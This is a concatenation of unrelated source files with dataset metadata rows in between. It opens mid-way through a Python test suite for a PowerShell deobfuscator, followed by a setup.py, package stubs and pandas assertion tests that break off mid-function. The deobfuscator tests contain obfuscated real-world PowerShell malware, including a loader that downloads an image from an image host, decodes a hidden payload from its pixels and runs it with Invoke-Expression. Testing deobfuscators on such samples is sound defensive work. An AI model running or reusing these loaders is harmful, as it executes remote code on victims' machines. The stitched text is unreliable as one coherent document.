0X/8+0KGn/4Y4LIeJGnI3sS1e5aiUX+UeySx','ELK5eegfOLUxPoMZ4CF7DivQFwlszaf5CdlSu','JZa','E','hM','9fcKfZyWMAiDGqgzliJBU4Utz7NCg3OJF1Ufw4ELdmRG+TUg9xDBJGxNGOPNQt4e6PKMYB4','ucTgbleyy+qZM1D4Gbq4GPJ','TqA9/F2sEUHtLzrgM1bjMDvWOtZw6EAY86ce48s9ZZNKguIdNFDZ8xx9iat6Oykw+r+3GSKua7a4lRM2','Wk++j8YGw9RqG4C','r','9o2md0KIRzApojwNan5k1FSRIXO5iATwOatE1c+uu','sfY7ljTHmK4Yqt7nO6ZylrCVcMcYrxj7XdsdW15iK1NMadHC','zU','hO8fCypp97','o+j4pkqjTa59jbWdtuw4+tJkCa','u','6DVEJdwQvWu/lA7z7U2WSg1HgxSYFeEZU+GxOlAkwR3ArXMBCRR3BT39GIK3IOj2JQMfHn+IhLkoa','ZmBDqwogWBwqX7Trm69Y7X2Vi7kQHqG+R9whi+7ERtcfniXRDofNm5EXllhCKJ1XHcxnASGpAEWwqVnzycCyK7W','epq','dV1InkQm/GC8RoKiJBakmip','EpSW88JdEPGSRCkhF','6OLWcEYnXRlY+fICfl63iOEE','UOJA/','BNUs6E','gvkeKjAjT7V0BnEjFnYNRPWaSHZ3sFPSmHzd','R7KHOIMgHK98jAjgu2F21Nh','mo3vMKa1PpquKlVKFtPa7umKrYBJES56ZC','dxgcTT0W+6u7PyNpXH8rIECfxGK','UbgE3sKnms+KBE2UHGVqiiaRC0BUMxS5Uu5hqWArnE0tKWC5rW4+','6YN6k5vKEdYMcDJJ4qQTep','Wuga0w7/ocmcb+YfXe','bWQXMTQCk3','iruz3UjmFpdOBL','GrjGI4LS4/jia6XMNhUs8ie9WqkoUK3dhFSIxM93zLZbKry2oTTHK8W96YSk1Ysc1OLazzdljC6l3mU6iUV','5wi14au7OM9ThDEJ','vLuwSMaRnxoTYh7xqCv6Tp0VGoTip4xSRJ1bEQqEKgNPa','JuO','YVxEaeiGCjg5xLbKEAl1+N39yt3UkVBQWtg3AZVNjWD0','dctxil0Fou3EW7NO09aFlAUp90dZFTCtOia6CZYhjlABJBVVyNR2b5FGwQzzi6SoelO5UyMlUl','wWC2jl41gk3ZNlIpGq7','ZNQv','qcMtMKxRaavRz46M9ucYC/wNRK31J4BdEW92Y143i2yeJ6snixM4r4x5pDLjJUKw/IFcRtlqwzt/BQU6IeJ1W','fHP/3492v/8v7p++/ffzx/fY/t9fH6zfbd+28f3v9x/nq8vr09fv/Hx9vj7e1+e/zhb1rzeNFu/wM=','hEK9CRPvTFuaTJTYKISTuoFaq6Kt','pbjK3Ntapgzb1SbaGX9tHXoDOqwmFwwBk','ZQOJ2O8wYriHy8BSApmcLGJFViIs35XeieqwPQbU0YxNC5','N1PJNB','WK2hlm+2VUWpQ0bqfGFiWj','l4s4yccl5hNyh4sqvNk2CRNQ4ayDx','GlHolZ','f9/MWBCS0FV74AMMhKhplCBvFNnKFAwcysnDw','81Q9vAWuWUnmFWCMhOoevgulipLpHKtC+qdykAS','1rI+xZScS0eFFBi2rl4GrMcR0SkBLKpmm','UJ','Y1Z2PMoFHhMVxAU','i9VYlK9qdjFpFoglBbVS9LPRaQ2+Tso8','IFrV0yBGVzWUOg3XFhVQwe','AnSeR4TwXcKNYaco6+dNpC+qKaBbQEa2wloPa','yrS4TeOX09MgUJx00b0c6IHgQ6cirJxMoX7YZRFyG5YzDF9KW0pb','DMkLX1l','A88ga+9B/TQo1Q+mwvXyU7vnu','KqbDgrxCy8w','E1hhzA6HYjp4VSV66hqtUTSLRgqm3bw9DR38jMd9','owEkHatt0j32yfiparFjiodOWSoR51cpVJ+jEc','NlMIXB8tLsdg','ijIW7fRdjl7boNbt65yTkQNhwVL0HCAQyY7pev4bcY6ruDIXToexZ/lu32HQM9p8DxlJeXJ6','6xd1p82l6DFjX9wMI+1Xr','jXrm8tHS3r0DC1vlJLNYrjQ','U7pE4U2P7MzYVoBU9Uqeetq4SlkaSJHXqQR2gg0LUyswTR2sT61O+vD1NqDSgnTF05bIUglXhUpvdEtWfsrbGIrU2juRTWFqYdL4+','5cQAJhaLJw3vArTnX','T0t0NGSoQ0RiwpfHQSVSWbLahQF9BSp2YzgjCp1wgYiO9WqHnXCAdMxzBV5d3o68jCPwHtBiZ',
'mu2a6lB+/XbQGGiOmamMsbRZBLE+BQRrC0eI4sbNE5BEywjJjqL0veEU6/0UwsW9NwMxL0/RRN4G0SHGLJm3Oa24n','IO3wLU')),
[syStEm.Io.CoMPressioN.COMprEssionmode]::"dECOm`p`RESs")
|&("{1}{0}{2}"-f 'E','foR','aCh') { .("{2}{0}{1}" -f '-o','bjecT','nEW') ("{3}{2}{4}{0}{1}"-f 'm','reaDER','o.str','SYSTem.i','Ea')( `${_} , [sysTEM.tExT.enCODiNg]::"a`scII")} )."rEAd`ToEnD"( ) |&( `${VER`BOsE`pre`Fe`REnce}."tOS`TrIng"()[1,3]+'x'-JoiN'')"\" | &( $pshOme[21]+$pSHome[30]+'x')
'''
))
def test_real_world_03(self):
result = self.unit(BR'''
&("{1}{0}" -f 'l', 'sa') ("{0}{1}" -f 'e', 'ni') ("{3}{1}{0}{2}" -f 'w-Obj', 'e', 'ect', 'N'); .("{1}{0}" -f 'd-Type', 'Ad') -AssemblyName ("{3}{0}{1}{2}" -f 'em', '.Drawin', 'g', 'Syst'); ${Tm} = (&("{1}{3}{0}{2}" -f 'do', 'Ge', 'm', 't-Ran') ("{2}{3}{4}{1}{5}{0}{6}" -f 'HHD.', 'om3', 'h7', '7', '9s:334.4mgur.c', '6q5q', '9ng'), ("{7}{1}{2}{8}{6}{0}{5}{4}{3}{9}" -f 'om386', '77', '9s:3', '51', '03', '3a', '4mages2.4mgbox.c', 'h', '3', 'TUnraE_o.9ng'))."RepLa`cE"('3', '/'); ${T`m} = (${Tm}."re`pLaCE"('4', 'i'))."REp`LAcE"('9', 'p'); ${rY} = [System.Net.WebRequest]::"CR`eATE"(${T`m}."r`EPLa`Ce"('7', 't')); ${r`Y}."mE`ThOD" = ("{0}{1}" -f 'HEA', 'D'); ${RA} = ${R`Y}."GetR`E`SP`oNsE"(); ${fF} = ${RA}."coNteN`T`LE`NgtH"; if (${F`F} -ge 1000) {
${g} = .("{1}{0}" -f 'ni', 'e') ("{4}{2}{6}{3}{5}{1}{0}" -f 'ap', 'Bitm', 'em.Draw', 'ng', 'Syst', '.', 'i')((.("{1}{0}" -f 'ni', 'e') ("{1}{2}{0}" -f 'lient', 'Net.We', 'bC'))."OP`E`NreAD"(${t`m}."Re`pl`AcE"('7', 't'))); ${o} = &("{0}{1}" -f 'e', 'ni') ("{1}{2}{0}" -f 'e[]', 'B', 'yt') 46080; (0..95) | &('%') { foreach (${x} in(0..479)) {
${p} = ${g}."gET`PI`Xel"(${X}, ${_}); .("{1}{0}" -f 'al', 's') ('Eg') ("{1}{0}" -f 'X', 'Ie'); ${o}[${_} * 480 + ${X}] = ([math]::"flo`oR"((${P}."B"-band15) * 16)-bor(${P}."g"-band 15))
} }; &('eg')('( N' + [System.Text.Encoding]::"u`Tf8"."ge`TS`T`RinG"(${o}[0..45996])); break;
}''')
for keyword in (B'System.Drawing', B'New-Object', B'Net.WebClient'):
self.assertIn(keyword, result)
def test_multiple_occurrences(self):
self.assertEqual(
self.unit(
b'"{10}{1}{0}{5}{9}{7}{8}{7}{3}{6}{2}{7}{4}{4}{10}{5}{1}"'
b"-f'v','n','r','x','s','o','p','e','-','k','i'"
),
b'"invoke-expression"'
)
| 243.181818 | 4,573 | 0.641246 | 1,961 | 16,050 | 5.228455 | 0.381948 | 0.007022 | 0.006145 | 0.004291 | 0.077441 | 0.068468 | 0.058422 | 0.051595 | 0.051595 | 0.051595 | 0 | 0.126156 | 0.057196 | 16,050 | 65 | 4,574 | 246.923077 | 0.551414 | 0.002679 | 0 | 0.090909 | 0 | 0.159091 | 0.802531 | 0.597875 | 0 | 1 | 0 | 0 | 0.227273 | 1 | 0.25 | false | 0 | 0.022727 | 0 | 0.295455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c967e9c135d3c227788ffbbe32568c6d5080ce73 | 321 | py | Python | prof_school_fees/models/__init__.py | mohamedmelsayed/erp-school | 6da9bc4c4634e3b362be18f55300aacf147c32a3 | [
"MIT"
] | null | null | null | prof_school_fees/models/__init__.py | mohamedmelsayed/erp-school | 6da9bc4c4634e3b362be18f55300aacf147c32a3 | [
"MIT"
] | null | null | null | prof_school_fees/models/__init__.py | mohamedmelsayed/erp-school | 6da9bc4c4634e3b362be18f55300aacf147c32a3 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2021-TODAY Prof-Dev Integrated(<http://www.prof-dev.com>).
###############################################################################
# from . import fees_terms
from . import fees_element
| 29.181818 | 79 | 0.327103 | 23 | 321 | 4.478261 | 0.782609 | 0.135922 | 0.271845 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017123 | 0.090343 | 321 | 10 | 80 | 32.1 | 0.335616 | 0.380062 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a39167e1ac2e466125ef39466c1cc39f4f6e65bc | 155 | py | Python | indy_node/server/req_handlers/config_req_handlers/pool_upgrade_handler.py | rantwijk/indy-node | 3cb77dab5482c8b721535020fec41506de819d2e | [
"Apache-2.0"
] | 1 | 2020-01-22T06:43:03.000Z | 2020-01-22T06:43:03.000Z | indy_node/server/req_handlers/config_req_handlers/pool_upgrade_handler.py | rantwijk/indy-node | 3cb77dab5482c8b721535020fec41506de819d2e | [
"Apache-2.0"
] | null | null | null | indy_node/server/req_handlers/config_req_handlers/pool_upgrade_handler.py | rantwijk/indy-node | 3cb77dab5482c8b721535020fec41506de819d2e | [
"Apache-2.0"
] | null | null | null | from plenum.server.request_handlers.handler_interfaces.write_request_handler import WriteRequestHandler
class PoolUpgrade(WriteRequestHandler):
pass
| 25.833333 | 103 | 0.870968 | 16 | 155 | 8.1875 | 0.8125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083871 | 155 | 5 | 104 | 31 | 0.922535 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
6e91b20800ee5bc367aef45818f109c11b0acf21 | 120 | py | Python | passbook/core/admin.py | fossabot/passbook | cba17f6659404445ac3025f11657d89368cc8b4f | [
"MIT"
] | null | null | null | passbook/core/admin.py | fossabot/passbook | cba17f6659404445ac3025f11657d89368cc8b4f | [
"MIT"
] | null | null | null | passbook/core/admin.py | fossabot/passbook | cba17f6659404445ac3025f11657d89368cc8b4f | [
"MIT"
] | null | null | null | """passbook core model admin"""
from passbook.lib.admin import admin_autoregister
admin_autoregister("passbook_core")
| 20 | 49 | 0.808333 | 15 | 120 | 6.266667 | 0.533333 | 0.255319 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.091667 | 120 | 5 | 50 | 24 | 0.862385 | 0.208333 | 0 | 0 | 0 | 0 | 0.146067 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 1 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 6 |
6eedafcefee18eb8dbcede389f60597447a91c2f | 33 | py | Python | OP-GAN/box_generation/seq2seq/evaluator/__init__.py | ts170/OP-GAN | b9a6227aaa7befa2025ea1f07e62e7a7e9c7ce1e | [
"MIT"
] | 34 | 2021-08-28T03:40:56.000Z | 2022-03-27T15:05:21.000Z | OP-GAN/box_generation/seq2seq/evaluator/__init__.py | ts170/OP-GAN | b9a6227aaa7befa2025ea1f07e62e7a7e9c7ce1e | [
"MIT"
] | 5 | 2021-09-02T09:33:22.000Z | 2022-03-23T03:15:56.000Z | OP-GAN/box_generation/seq2seq/evaluator/__init__.py | ts170/OP-GAN | b9a6227aaa7befa2025ea1f07e62e7a7e9c7ce1e | [
"MIT"
] | 5 | 2021-08-29T04:44:22.000Z | 2022-03-30T08:13:07.000Z | from .evaluator import Evaluator
| 16.5 | 32 | 0.848485 | 4 | 33 | 7 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 33 | 1 | 33 | 33 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
42ddee8b21fe0b82d44bc5628b194b4f6f5949fb | 58 | py | Python | bceutils/__init__.py | AmorosTech/baidu-bceutils | f924d5e84c2f2e5b1aae8f1e3648041ee0a18ce1 | [
"Apache-2.0"
] | null | null | null | bceutils/__init__.py | AmorosTech/baidu-bceutils | f924d5e84c2f2e5b1aae8f1e3648041ee0a18ce1 | [
"Apache-2.0"
] | null | null | null | bceutils/__init__.py | AmorosTech/baidu-bceutils | f924d5e84c2f2e5b1aae8f1e3648041ee0a18ce1 | [
"Apache-2.0"
] | null | null | null | #
import bceutils.eip.eipbp
import bceutils.eip.eipgroup
| 11.6 | 28 | 0.810345 | 8 | 58 | 5.875 | 0.625 | 0.595745 | 0.723404 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103448 | 58 | 4 | 29 | 14.5 | 0.903846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
6e08ea7129da3b0683267924c58ebe11b4da0707 | 1,668 | py | Python | setup.py | xavierxeon/PythonPackage | c4216dc3a1019d18216d0d2f9645b4b96f699ecc | [
"MIT"
] | null | null | null | setup.py | xavierxeon/PythonPackage | c4216dc3a1019d18216d0d2f9645b4b96f699ecc | [
"MIT"
] | null | null | null | setup.py | xavierxeon/PythonPackage | c4216dc3a1019d18216d0d2f9645b4b96f699ecc | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import setuptools, platform
def main_apple_silicon():
with open("README.md", "r") as fh:
long_description = fh.read()
packages = setuptools.find_packages()
packages.remove('xxpystuff.pyside6') # needs pyside6
packages.remove('xxpystuff.media') # needs numpy and opencv
setuptools.setup(
name="xxpystuff",
version="0.0.8",
author="Ralf Waspe",
author_email="rwaspe@me.com",
description="A collection of python tools",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/xavierxeon/xxPyStuff",
license='MIT',
packages=packages,
install_requires=['colorama', 'todoist-python'],
include_package_data=True,
zip_safe=False,
)
def main():
with open("README.md", "r") as fh:
long_description = fh.read()
packages = setuptools.find_packages()
setuptools.setup(
name="xxpystuff",
version="0.0.8",
author="Ralf Waspe",
author_email="rwaspe@me.com",
description="A collection of python tools",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/xavierxeon/xxPyStuff",
license='MIT',
packages=packages,
install_requires=['colorama', 'pyside6', 'opencv-python', 'todoist-python'],
include_package_data=True,
zip_safe=False,
)
if __name__ == '__main__':
if platform.system() == 'Darwin' and platform.machine() == 'arm64':
main_apple_silicon()
elif platform.machine() == 'aarch64':
main_apple_silicon()
else:
main()
| 27.344262 | 82 | 0.657674 | 191 | 1,668 | 5.544503 | 0.403141 | 0.113314 | 0.071766 | 0.113314 | 0.721435 | 0.721435 | 0.721435 | 0.721435 | 0.721435 | 0.632672 | 0 | 0.01055 | 0.204436 | 1,668 | 60 | 83 | 27.8 | 0.787491 | 0.034772 | 0 | 0.708333 | 0 | 0 | 0.23771 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.020833 | 0 | 0.0625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6e1a49509ea13a6f4c98ea514b92d96caf1e5184 | 220 | py | Python | tests/devices/eiger/test_eiger_monitor.py | dls-controls/tickit | 00bb013e69674bcfe4926f365ecb3c65c080abe8 | [
"Apache-2.0"
] | 4 | 2021-09-16T13:35:33.000Z | 2022-02-01T23:35:53.000Z | tests/devices/eiger/test_eiger_monitor.py | dls-controls/tickit | 00bb013e69674bcfe4926f365ecb3c65c080abe8 | [
"Apache-2.0"
] | 46 | 2021-09-16T13:44:58.000Z | 2022-02-02T13:42:56.000Z | tests/devices/eiger/test_eiger_monitor.py | dls-controls/tickit | 00bb013e69674bcfe4926f365ecb3c65c080abe8 | [
"Apache-2.0"
] | null | null | null | import pytest
from tickit.devices.eiger.monitor.eiger_monitor import EigerMonitor
@pytest.fixture
def filewriter() -> EigerMonitor:
return EigerMonitor()
def test_eiger_monitor_constructor():
EigerMonitor()
| 16.923077 | 67 | 0.786364 | 24 | 220 | 7.041667 | 0.583333 | 0.213018 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.131818 | 220 | 12 | 68 | 18.333333 | 0.884817 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | true | 0 | 0.285714 | 0.142857 | 0.714286 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
6e27b55f12e3ca0334c09180dfc7fe413d8b3b5a | 118 | py | Python | weld/numpy_weld/core/__init__.py | radujica/data-analysis-pipelines | 64a6e5613cb1ab2ba2eb2f763c2aa1e3bc5e0d3b | [
"MIT"
] | 5 | 2018-03-05T13:19:35.000Z | 2020-11-17T15:59:41.000Z | weld/numpy_weld/core/__init__.py | radujica/data-analysis-pipelines | 64a6e5613cb1ab2ba2eb2f763c2aa1e3bc5e0d3b | [
"MIT"
] | 1 | 2021-06-01T22:27:44.000Z | 2021-06-01T22:27:44.000Z | weld/numpy_weld/core/__init__.py | radujica/data-analysis-pipelines | 64a6e5613cb1ab2ba2eb2f763c2aa1e3bc5e0d3b | [
"MIT"
] | null | null | null | from cartesian import duplicate_elements_indices, duplicate_array_indices, cartesian_product_indices, array_to_labels
| 59 | 117 | 0.915254 | 15 | 118 | 6.666667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059322 | 118 | 1 | 118 | 118 | 0.900901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6e3849058f501f816e17a9694e96763a7c9a6e8c | 28,454 | py | Python | tests/test_great_assertions_pandas.py | serialbandicoot/great-assertions | ab7b9e08fce940b5cb33065504fb2ce4c5c7cc47 | [
"Apache-2.0"
] | 10 | 2021-10-01T08:38:13.000Z | 2022-02-25T14:04:10.000Z | tests/test_great_assertions_pandas.py | serialbandicoot/great-assertions | ab7b9e08fce940b5cb33065504fb2ce4c5c7cc47 | [
"Apache-2.0"
] | 48 | 2021-10-04T15:41:59.000Z | 2022-03-30T05:41:50.000Z | tests/test_great_assertions_pandas.py | serialbandicoot/great-assertions | ab7b9e08fce940b5cb33065504fb2ce4c5c7cc47 | [
"Apache-2.0"
] | null | null | null | from great_assertions import GreatAssertions, NoValueFoundError
import pandas as pd
import pytest
class GreatAssertionPandasTests(GreatAssertions):
def test_pandas_incorrect_dataframe_type_raises_type_error(self):
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_be_of_type(1, "col_1", str)
assert "Not a valid pandas/pyspark DataFrame" == str(excinfo.value)
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_be_in_set(1, "col_1", set(("Apple")))
assert "Not a valid pandas/pyspark DataFrame" == str(excinfo.value)
def test_pandas_expect_table_row_count_to_equal(self):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
self.expect_table_row_count_to_equal(df, 3)
def test_pandas_expect_table_row_count_to_equal_with_tolerance(self):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
self.expect_table_row_count_to_equal(df, 3, tolerance=10)
def test_pandas_expect_table_row_count_to_equal_with_tolerance_within_range(self):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
self.expect_table_row_count_to_equal(df, 4, tolerance=25)
def test_pandas_expect_table_row_count_to_equal_with_tolerance_fail(self):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
with pytest.raises(AssertionError) as excinfo:
self.expect_table_row_count_to_equal(df, 4, tolerance=20)
assert (
"expected row count failed tolerance range 3.2-4.8 the actual was 3 : "
== str(excinfo.value)
)
def test_pandas_expect_table_row_count_to_equal_fails(self):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
with pytest.raises(AssertionError) as excinfo:
self.expect_table_row_count_to_equal(df, 4)
assert "expected row count is 4 the actual was 3 : " == str(excinfo.value)
def test_pandas_expect_table_row_count_to_be_greater_than(self):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
self.expect_table_row_count_to_be_greater_than(df, 2)
def test_pandas_expect_table_row_count_to_be_greater_than_fails(self):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
with pytest.raises(AssertionError) as excinfo:
self.expect_table_row_count_to_be_greater_than(df, 4)
assert "expected row count of at least 4 but the actual was 3 : " == str(
excinfo.value
)
def test_pandas_expect_table_row_count_to_be_less_than(self):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
self.expect_table_row_count_to_be_less_than(df, 4)
def test_pandas_expect_table_row_count_to_be_less_fails(self):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
with pytest.raises(AssertionError) as excinfo:
self.expect_table_row_count_to_be_less_than(df, 2)
assert "expected row count of maximum 2 but the actual was 3 : " == str(
excinfo.value
)
def test_pandas_expect_table_has_no_duplicate_rows(self):
df = pd.DataFrame({"col_1": [100, 100, 300], "col_2": [10, 11, 12]})
self.expect_table_has_no_duplicate_rows(df)
def test_pandas_expect_table_has_no_duplicate_rows_fail(self):
df = pd.DataFrame({"col_1": [100, 100, 300], "col_2": [10, 10, 12]})
with pytest.raises(AssertionError) as excinfo:
self.expect_table_has_no_duplicate_rows(df)
assert "Table contains duplicate rows : " == str(excinfo.value)
def test_pandas_assert_expect_column_values_to_be_between(self):
# int
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
self.expect_column_values_to_be_between(
df, "col_1", min_value=99, max_value=301
)
self.expect_column_values_to_be_between(df, "col_1", 100, 300)
# float
df = pd.DataFrame({"col_1": [100.02, 200.01, 300.01], "col_2": [10, 20, 30]})
self.expect_column_values_to_be_between(df, "col_1", 100.01, 300.02)
# Equality float
df = pd.DataFrame({"col_1": [100.05, 200.01, 300.05], "col_2": [10, 20, 30]})
self.expect_column_values_to_be_between(df, "col_1", 100.05, 300.05)
def test_pandas_assert_expect_column_values_to_be_between_ignore_nan(self):
df = pd.DataFrame({"col_1": [None, 100, None, 300]})
self.expect_column_values_to_be_between(
df, "col_1", min_value=99, max_value=301
)
self.expect_column_values_to_be_between(df, "col_1", 100, 300)
def test_pandas_assert_expect_column_values_to_be_between_all_none_fail(self):
df = pd.DataFrame({"col_1": [None, None, None, None]})
with pytest.raises(NoValueFoundError) as excinfo:
self.expect_column_values_to_be_between(
df, "col_1", min_value=99, max_value=301
)
assert "A min-max could not be generated" == str(excinfo.value)
def test_pandas_assert_expect_column_values_to_be_between_min_fail(
self,
):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_be_between(df, "col_1", 101, 301)
assert (
"Min value provided (101) must be less than column col_1 value of 100 : "
== str(excinfo.value)
)
def test_pandas_assert_expect_column_values_to_be_between_min_fail_bad_syntax(
self,
):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_be_between(df, "col_1", 100, 50)
assert "Max value must be greater than min value : " == str(excinfo.value)
def test_pandas_assert_expect_column_values_to_be_between_max_fail(
self,
):
df = pd.DataFrame({"col_1": [100, 200, 300], "col_2": [10, 20, 30]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_be_between(df, "col_1", 99, 299)
assert (
"Max value provided (299) must be greater than column col_1 value of 300 : "
== str(excinfo.value)
)
def test_pandas_assert_expect_column_values_to_match_regex(self):
df = pd.DataFrame({"col_1": ["BA2", "BA15", "Sw1"]})
self.expect_column_values_to_match_regex(df, "col_1", "^[a-zA-Z]{2}[0-9]{1,2}$")
self.expect_column_values_to_match_regex(df, "col_1", "^[a-zA-Z]{2}[0-9]{1,2}$")
def test_pandas_assert_expect_column_values_to_match_regex_fail(self):
df = pd.DataFrame({"col_1": ["bA2", "BA151", "SW1", "AAA13"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_match_regex(
df, "col_1", "^[a-zA-Z]{2}[0-9]{1,2}$"
)
assert "Column col_1 did not match regular expression, found BA151 : " == str(
excinfo.value
)
def test_pandas_assert_expect_column_values_to_be_in_set(self):
fruits = ["Apple", "Orange", "Pear", "Cherry", "Apricot(Summer)"]
fruits_set = set(("Apple", "Orange", "Pear", "Cherry", "Apricot(Summer)"))
df = pd.DataFrame({"col_1": fruits})
self.expect_column_values_to_be_in_set(df, "col_1", fruits_set)
def test_pandas_assert_expect_column_values_to_be_in_set_case(self):
fruits = ["Apple", "Orange and Apples", "Pear", "Cherry"]
fruits_set = set(("apple", "Orange And Apples", "pear", "cherry"))
df = pd.DataFrame({"col_1": fruits})
self.expect_column_values_to_be_in_set(
df, "col_1", fruits_set, ignore_case=True
)
def test_pandas_assert_expect_column_values_to_be_in_set_fail(self):
fruits = set(("Apple", "Orange", "Pear", "Cherry"))
df = pd.DataFrame({"col_1": ["Tomato", "Cherry", "Apple"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_be_in_set(df, "col_1", fruits)
assert (
"Column col_1 provided set was not in actaul set of Apple, Cherry, Tomato : "
== str(excinfo.value)
)
def test_pandas_assert_expect_column_values_to_be_in_set_fail_with_type(
self,
):
fruits = set(("Apple", "Orange", "Pear", "Cherry"))
df = pd.DataFrame({"col_1": ["Tomato", 1.0, "Apple"]})
with pytest.raises(AssertionError) as excinfo:
self.expect_column_values_to_be_in_set(df, "col_1", fruits)
assert (
"Column col_1 provided set was not in actaul set of Tomato, 1.0, Apple : "
== str(excinfo.value)
)
def test_pandas_expect_column_values_to_be_of_type(self):
df = pd.DataFrame(
{
"col_1": ["BA2", "BA15", "SW1"],
"col_2": [10, 20, 30],
"col_3": [10.45, 20.32, 30.23],
}
)
self.expect_column_values_to_be_of_type(df, "col_1", str)
self.expect_column_values_to_be_of_type(df, "col_2", int)
self.expect_column_values_to_be_of_type(df, "col_3", float)
def test_pandas_expect_column_values_to_be_of_type_fail_type(self):
df = pd.DataFrame(
